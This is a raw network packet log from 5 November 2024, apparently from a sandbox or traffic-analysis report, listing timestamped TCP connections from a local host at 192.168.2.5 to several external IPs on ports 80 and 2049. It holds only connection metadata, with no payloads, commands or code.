                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.832169056 CET5975180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.832312107 CET5975180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.832334042 CET5975180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.838217020 CET805975118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.838228941 CET805975118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.913966894 CET204959750212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.914062023 CET597502049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.914319992 CET597502049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.919799089 CET80597493.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.919975042 CET5974980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.926274061 CET80597493.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:03:59.926362991 CET5974980192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.236598015 CET5975280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.242456913 CET805975218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.242527008 CET5975280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.242958069 CET5975280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.242971897 CET5975280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.247828960 CET805975218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.247838974 CET805975218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.505268097 CET805975118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.505645990 CET5975180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.510989904 CET805975118.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.511080980 CET5975180192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.538250923 CET5975380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.543190956 CET805975313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.543935061 CET5975380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.544456005 CET5975380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.544485092 CET5975380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.550069094 CET805975313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:00.550280094 CET805975313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.078316927 CET805975218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.078521013 CET5975280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.083801031 CET805975218.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.083878994 CET5975280192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.318288088 CET5975480192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.323204041 CET80597543.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.323301077 CET5975480192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.323533058 CET5975480192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.323553085 CET5975480192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.328494072 CET80597543.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.328670979 CET80597543.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.988516092 CET805975313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.988732100 CET5975380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.993881941 CET805975313.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:01.993953943 CET5975380192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.031409979 CET5975580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.036545038 CET805975513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.036730051 CET5975580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.036928892 CET5975580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.036928892 CET5975580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.041853905 CET805975513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.041867018 CET805975513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.291873932 CET80597543.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.292123079 CET5975480192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.298626900 CET80597543.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.298701048 CET5975480192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.571988106 CET5975680192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.576859951 CET805975685.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.577042103 CET5975680192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.583544016 CET5975680192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.583578110 CET5975680192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.588524103 CET805975685.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:02.588535070 CET805975685.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.450649023 CET805975685.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.489908934 CET805975513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.490080118 CET5975580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.495346069 CET805975513.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.495404005 CET5975580192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.497009039 CET5975680192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.525305033 CET5975780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.530249119 CET805975734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.530320883 CET5975780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.530846119 CET5975780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.530874968 CET5975780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.535695076 CET805975734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.535706043 CET805975734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.699820995 CET5975880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.705414057 CET805975847.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.707117081 CET5975880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.707349062 CET5975880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.707367897 CET5975880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.714268923 CET805975847.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:03.714405060 CET805975847.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.363642931 CET805975734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.369368076 CET5975780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.375519991 CET805975734.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.377218008 CET5975780192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.421638012 CET5975980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.426453114 CET805975947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.426599979 CET5975980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.427057028 CET5975980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.427057028 CET5975980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.431874037 CET805975947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.431924105 CET805975947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.921108961 CET597602049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.926009893 CET204959760212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.926098108 CET597602049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.931854010 CET597602049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:04.936729908 CET204959760212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.142234087 CET805975847.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.142606020 CET5975880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.147835970 CET805975847.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.147965908 CET5975880192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.411500931 CET204959760212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.411595106 CET597602049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.411936998 CET597602049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.673758030 CET5976180192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.679622889 CET805976134.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.679699898 CET5976180192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.679887056 CET5976180192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.679903030 CET5976180192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.685915947 CET805976134.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.685928106 CET805976134.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.847815037 CET805975947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.848001003 CET5975980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.854352951 CET805975947.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.854454994 CET5975980192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.901132107 CET5976280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.906119108 CET805976213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.906220913 CET5976280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.906404972 CET5976280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.906457901 CET5976280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.913743019 CET805976213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:05.913758039 CET805976213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:06.510561943 CET805976134.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:06.510859966 CET5976180192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:06.517472982 CET805976134.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:06.517592907 CET5976180192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:06.869776011 CET5976380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:06.874650955 CET805976347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:06.874752998 CET5976380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:06.875323057 CET5976380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:06.875462055 CET5976380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:06.880171061 CET805976347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:06.880747080 CET805976347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:07.326438904 CET805976213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:07.326703072 CET5976280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:07.332106113 CET805976213.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:07.332212925 CET5976280192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:07.365673065 CET5976480192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:07.370692968 CET805976434.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:07.370804071 CET5976480192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:07.371391058 CET5976480192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:07.371409893 CET5976480192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:07.376283884 CET805976434.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:07.376331091 CET805976434.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.215600014 CET805976434.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.215948105 CET5976480192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.221231937 CET805976434.211.97.45192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.221304893 CET5976480192.168.2.534.211.97.45
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.249470949 CET5976580192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.254432917 CET80597653.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.254501104 CET5976580192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.254694939 CET5976580192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.254714012 CET5976580192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.259654999 CET80597653.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.259665966 CET80597653.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.312319040 CET805976347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.312525988 CET5976380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.317734957 CET805976347.129.31.212192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.317816973 CET5976380192.168.2.547.129.31.212
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.632221937 CET5976680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.642043114 CET805976618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.642129898 CET5976680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.642319918 CET5976680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.642338991 CET5976680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.648552895 CET805976618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.648565054 CET805976618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.916470051 CET80597653.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.918622017 CET5976580192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.924917936 CET80597653.94.10.34192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.925008059 CET5976580192.168.2.53.94.10.34
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.983334064 CET5976780192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.988253117 CET805976718.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.988337040 CET5976780192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.988497019 CET5976780192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.988497019 CET5976780192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.993490934 CET805976718.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:08.993501902 CET805976718.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.334265947 CET805976618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.334528923 CET5976680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.339728117 CET805976618.208.156.248192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.341830969 CET5976680192.168.2.518.208.156.248
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.810683966 CET805976718.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.856529951 CET5976780192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.894417048 CET5976780192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.900628090 CET805976718.246.231.120192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.900755882 CET5976780192.168.2.518.246.231.120
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.941807985 CET5976880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.948064089 CET805976813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.948141098 CET5976880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.950536013 CET5976880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.950536966 CET5976880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.956685066 CET805976813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.956698895 CET805976813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.971448898 CET5976980192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.977562904 CET80597693.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.978442907 CET5976980192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.978607893 CET5976980192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.978621960 CET5976980192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.984814882 CET80597693.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:09.985124111 CET80597693.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.420799017 CET597702049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.425798893 CET204959770212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.425880909 CET597702049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.426132917 CET597702049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.435937881 CET204959770212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.536514044 CET8059604165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.536602020 CET5960480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.541627884 CET5960480192.168.2.5165.160.15.20
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.547538042 CET8059604165.160.15.20192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.916894913 CET204959770212.162.149.53192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.916960955 CET597702049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.917687893 CET597702049192.168.2.5212.162.149.53
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.946290970 CET80597693.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.966521978 CET5976980192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.972033024 CET80597693.254.94.185192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:10.972122908 CET5976980192.168.2.53.254.94.185
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.039254904 CET5977180192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.044099092 CET805977185.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.044172049 CET5977180192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.044851065 CET5977180192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.044873953 CET5977180192.168.2.585.214.228.140
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.049652100 CET805977185.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.050151110 CET805977185.214.228.140192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.366755009 CET805976813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.367098093 CET5976880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.372889996 CET805976813.251.16.150192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.372994900 CET5976880192.168.2.513.251.16.150
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.620368958 CET5977280192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.625436068 CET805977234.246.200.160192.168.2.5
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.625572920 CET5977280192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.626034021 CET5977280192.168.2.534.246.200.160
                                                                                                                                                                                                                                                                                                                                                                                                              Nov 5, 2024 17:04:11.626050949 CET5977280192.168.2.534.246.200.160
